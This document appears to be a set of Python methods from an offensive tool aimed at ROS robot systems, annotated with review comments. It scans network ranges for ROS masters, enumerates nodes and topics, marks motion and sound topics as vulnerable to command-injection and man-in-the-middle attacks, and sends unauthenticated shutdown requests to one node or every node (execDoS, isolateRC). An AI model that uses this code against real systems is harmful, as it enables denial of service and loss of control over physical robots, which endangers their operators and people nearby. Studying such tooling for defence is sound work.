Example #1
    def topicAnalyser(self, host, port, attack):
        """Report the topics on one ROS master that matter for a scenario.

        Asks the master at ``host:port`` (through ``api.XMLRPC_API``) for its
        topic list and inspects each entry, reading index 0 as the topic name
        and index 1 as the message type.

        Args:
            host: Address of the ROS master to query.
            port: Port of the ROS master.
            attack: Scenario selector; only ``'ACI'`` and ``'MITM'`` are handled.

        Returns:
            For ``'ACI'``: the entries named ``/sound``, ``/cmd_vel`` or
            ``/motor_power`` (possibly an empty list). They are also printed
            when at least one is present.
            For ``'MITM'``: ``True`` when a ``/cmd_vel`` topic exists.
            ``None`` otherwise, including when the master reports no topics
            or ``/cmd_vel`` is absent.
        """
        # Topic names this tool flags; a deployment that exposes them through
        # an openly reachable master is what the listing below points at.
        sensitive_names = ['/sound', '/cmd_vel', '/motor_power']
        master = api.XMLRPC_API(host, port)
        topic_types = master.getTopicTypes()

        if len(topic_types) == 0:
            return None

        if attack == 'ACI':
            matches = [entry for entry in topic_types if entry[0] in sensitive_names]
            if matches:
                os.system('clear')
                cprint("\r[+] Topics on target that are vulnerable for ACI attack:", 'green', attrs=['bold'])
                for index, entry in enumerate(matches, start=1):
                    print("    [" + str(index) + "] '{}' with message type '{}'".
                          format(entry[0], entry[1]))
            return matches

        if attack == 'MITM':
            # NOTE(review): the negative result is None rather than False, so
            # callers can only rely on truthiness here.
            if any(entry[0] == '/cmd_vel' for entry in topic_types):
                return True

        return None
Example #2
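    def execShutdown(self, host, port, nodes):
        """Prompt for a node number and send that node a shutdown request.

        The prompt repeats until a valid number is entered. Menu numbers start
        at 1, matching the numbered listing printed elsewhere in this file.

        Args:
            host: Address of the ROS master used to build the API client.
            port: Port of the ROS master.
            nodes: Sequence of node entries; index 0 is used as the display
                name and index 1 is the value handed to ``rpc.shutdown``.

        Returns:
            None. Returns immediately when ``nodes`` is empty.
        """
        if not nodes:
            # With nothing to choose from, no input could ever be valid and
            # the prompt below would never terminate.
            print("[!] No nodes available to select")
            return

        while True:
            # Only the integer conversion is guarded, so a ValueError raised
            # by the RPC layer is no longer misreported as bad input.
            try:
                option = int(input("\nSelect node to shutdown: "))
            except ValueError:
                sys.stdout.write(colored("\r[!] Invalid input", 'red'))
                time.sleep(1.5)
                continue

            # Accept 1..len(nodes) only. The previous range check let 0
            # through, and nodes[0 - 1] wraps to the LAST entry, so a request
            # went to a node the operator had not selected.
            if not 1 <= option <= len(nodes):
                sys.stdout.write(colored("\r[!] Invalid input", 'red'))
                time.sleep(1.5)
                continue

            selected = nodes[option - 1]
            rpc = api.XMLRPC_API(host, port)
            rpc.shutdown(selected[1])
            os.system('clear')
            print(
                colored(
                    "[+] Successfully send shutdown command to node: {}"
                    .format(selected[0]),
                    'green',
                    attrs=['bold']))
            break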
Example #3
    def systemRecon(self):
        """Print, per known master, each node with its topics and services.

        For every ``(host, port)`` pair in ``self.master_hosts`` the master's
        system state is fetched as three lists (publishers, subscribers,
        services). Each list entry is read as ``[name, [node, ...]]``.

        Returns:
            None. All results are written to stdout.
        """
        # NOTE(review): this list is created once, outside the host loop, so
        # nodes collected from an earlier master are listed again under every
        # later master. Confirm whether a per-host reset was intended.
        active_nodes = []
        for host, port in self.master_hosts:
            rpc = api.XMLRPC_API(host, port)
            publisher, subscriber, service = rpc.getSystemState()

            # Only the first node of each publisher/subscriber entry is
            # collected; service-only nodes are never added.
            for group in (publisher, subscriber):
                for entry in group:
                    if entry[1][0] not in active_nodes:
                        active_nodes.append(entry[1][0])

            cprint("[+] Enumeration of ROS environment " + host + " successfully completed:\n", 'green', attrs=['bold'])

            sections = (
                ("        Publishing to:", publisher),
                ("\n        Subscribed to:", subscriber),
                ("\n        Services:", service),
            )
            for position, node in enumerate(active_nodes, start=1):
                print(colored("  [" + str(position) + "] Node: " + node, 'cyan', attrs=['bold']))
                for heading, entries in sections:
                    print(colored(heading, 'white', attrs=['bold']))
                    for entry in entries:
                        if node in entry[1]:
                            print("             " + entry[0])
                print()
Example #4
    def execDoS(self, host, port):
        """Send a shutdown request to every node the master reports.

        Args:
            host: Address of the ROS master used to build the API client.
            port: Port of the ROS master.

        Returns:
            None. Nothing is sent when ``filterNodes()`` yields no entries.
        """
        # NOTE(review): no credential is passed anywhere in this call chain,
        # so this presumably relies on the target accepting unauthenticated
        # XML-RPC requests. Limiting which hosts can reach the master and
        # node ports is the relevant control; confirm against
        # api.XMLRPC_API.
        master = api.XMLRPC_API(host, port)
        running = master.filterNodes()
        if len(running) == 0:
            return
        for entry in running:
            # Index 1 is the value nodesAnalyser prints as the node's URI.
            master.shutdown(entry[1])
Example #5
    def isolateRC(self, host, port, rc_node):
        """Send a shutdown request to the node(s) named like ``rc_node``.

        Args:
            host: Address of the ROS master used to build the API client.
            port: Port of the ROS master.
            rc_node: Node entry whose index 0 (the name) selects the target.

        Returns:
            None. Nothing is sent when no reported node has a matching name.
        """
        master = api.XMLRPC_API(host, port)
        running = master.filterNodes()
        if len(running) == 0:
            return

        wanted_name = rc_node[0]
        for entry in running:
            if wanted_name != entry[0]:
                continue
            # The request uses the entry from the fresh listing (index 1),
            # not whatever rc_node itself carries.
            master.shutdown(entry[1])
Example #6
    def defaultMasterFinder(self):
        """Record hosts that answer as a ROS master on port 11311.

        Scans the address range produced by ``self.ipscan.ipConstructor()``,
        drops the gateway address, and appends ``[host, 11311]`` to
        ``self.found_master_hosts`` for each host whose ``masterCheck()``
        compares equal to ``True``.

        Returns:
            None. Results accumulate in ``self.found_master_hosts``.
        """
        # 11311 is the port a ROS 1 master listens on by default.
        # NOTE(review): presumably a range-wide probe of this port; that is
        # the pattern to watch for in network monitoring. Confirm against
        # network.NetworkScanner.
        default_port = 11311
        scanned = network.NetworkScanner(self.ipscan.ipConstructor(),
                                         default_port).nmapScan()
        candidates = list(
            filter(lambda addr: addr != self.ipscan.ipGateway(), scanned))
        for addr in candidates:
            probe = api.XMLRPC_API(addr, default_port)
            # Equality test kept as written; masterCheck()'s return type is
            # not visible here.
            if probe.masterCheck() == True:
                self.found_master_hosts.append([addr, default_port])
Example #7
    def nodesAnalyser(self, host, port):
        """Print a numbered list of the nodes a master reports and return it.

        Args:
            host: Address of the ROS master to query.
            port: Port of the ROS master.

        Returns:
            Whatever ``filterNodes()`` returned. Each entry is printed as
            name (index 0), URI (index 1) and PID (index 2); an empty result
            is returned without printing or clearing the screen.
        """
        master = api.XMLRPC_API(host, port)
        running = master.filterNodes()

        if len(running) == 0:
            return running

        os.system('clear')
        cprint("\r[+] Running node(s) on target:", 'green', attrs=['bold'])
        for index, entry in enumerate(running, start=1):
            print("    [" + str(index) + "] Node: {} \n      URI: {} \n      PID: {}".
                  format(entry[0], entry[1], entry[2]))
        return running
Example #8
    def topicRecon(self):
        """Print every topic and message type for each known master.

        Iterates ``self.master_hosts`` and, per master, lists the entries of
        ``getTopicTypes()`` with a running number. Entries named ``/sound``,
        ``/cmd_vel`` or ``/motor_power`` are tagged ``[VULNERABLE]`` and
        printed in red; a master with no topics gets a single notice line.

        Returns:
            None. All results are written to stdout.
        """
        flagged_names = ['/sound', '/cmd_vel', '/motor_power']
        for host, port in self.master_hosts:
            topic_types = api.XMLRPC_API(host, port).getTopicTypes()

            if len(topic_types) == 0:
                cprint("\n[-] No active topics are found on the target system: {}".format(host), 'red', attrs=['bold'])
                continue

            cprint("\n[+] Identified topics and message types on target: {}".format(host), 'green', attrs=['bold'])
            for index, entry in enumerate(topic_types, start=1):
                if entry[0] in flagged_names:
                    cprint("    [" + str(index) + "] [VULNERABLE] '{}' with message type '{}'".
                           format(entry[0], entry[1]), 'red')
                else:
                    print("    [" + str(index) + "] '{}' with message type '{}'".format(entry[0], entry[1]))
Example #9
    def definedMasterFinder(self):
        """Scan the configured port range for ROS masters, one hit per call.

        Ports are taken from ``self.port_range_start + self.port_range_counter``
        up to, but not including, ``self.port_range_end``. The counter is
        advanced for every port visited, so a later call starts after the
        last port this call handled. Port 11311 is skipped here.

        Confirmed masters are appended as ``[host, port]`` to both
        ``self.found_master_hosts`` and ``self.temp_masters_bin``.

        Returns:
            None. The method returns after the first port on which the scan
            reports any non-gateway host, or when the range is exhausted.
        """

        for port in range((self.port_range_start + self.port_range_counter),
                          self.port_range_end):
            # Advance the resume position before anything can skip or return.
            self.port_range_counter += 1
            if port == 11311:
                continue

            # Reset per port, so this list only ever holds the latest port's
            # confirmed masters.
            self.temp_masters_bin = []
            active_hosts = network.NetworkScanner(self.ipscan.ipConstructor(),
                                                  port).nmapScan()
            # Drop the gateway address from the scan result.
            active_hosts = [
                h for h in active_hosts if h != self.ipscan.ipGateway()
            ]
            if len(active_hosts) > 0:
                for host in active_hosts:
                    rpc = api.XMLRPC_API(host, port)
                    if rpc.masterCheck() == True:
                        self.found_master_hosts.append([host, port])
                        self.temp_masters_bin.append([host, port])
                # NOTE(review): this returns even when no host passed
                # masterCheck(), leaving temp_masters_bin empty; callers
                # presumably check that list. Confirm.
                return